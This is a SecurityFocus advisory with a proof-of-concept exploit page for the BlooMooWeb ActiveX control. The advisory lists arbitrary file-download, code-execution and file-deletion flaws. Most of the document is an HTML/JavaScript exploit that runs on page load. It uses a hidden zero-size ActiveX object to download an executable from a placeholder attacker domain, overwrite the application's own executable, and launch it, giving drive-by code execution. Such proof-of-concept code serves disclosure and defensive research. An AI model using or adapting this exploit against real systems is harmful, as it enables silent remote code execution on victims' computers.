40 lines
No EOL
1 KiB
HTML
40 lines
No EOL
1 KiB
HTML
source: https://www.securityfocus.com/bid/20827/info
|
|
|
|
BlooMooWeb ActiveX control is prone to multiple vulnerabilities, including:
|
|
|
|
- an arbitrary file-download issue
|
|
- an arbitrary code-execution issue
|
|
- an arbitrary file-deletion issue.
|
|
|
|
An attacker can exploit these issues to download arbitrary files, execute arbitrary code within the context of the affected application, and delete arbitrary files.
|
|
|
|
<html>
|
|
<head>
|
|
<script language="JavaScript">
|
|
|
|
var binaryUrl="http://some_attacker_controlled_domain/attackerfile.exe";
|
|
|
|
function spawn2()
|
|
{
|
|
aa1=o2obj.GetInstallationDir(null);
|
|
aa2="BlooMooWEB.exe";
|
|
o2obj.BW_DownloadFile(binaryUrl,aa1+aa2,"callback001");
|
|
}
|
|
|
|
function callback001( msgCode, param1, param2, param3 )
|
|
{
|
|
if(msgCode == 'DOWNLOAD_COMPLETE' )
|
|
{
|
|
o2obj.BW_LaunchGame("treleferekuku");
|
|
}
|
|
}
|
|
|
|
</script>
|
|
</head>
|
|
|
|
<body onload="spawn2()">
|
|
<object ID="o2obj" WIDTH=0 HEIGHT=0
|
|
CLASSID="CLSID:22E9EFBA-114C-4DA0-AE72-D8F2C7138002"
|
|
</object>
|
|
</body>
|
|
</html> |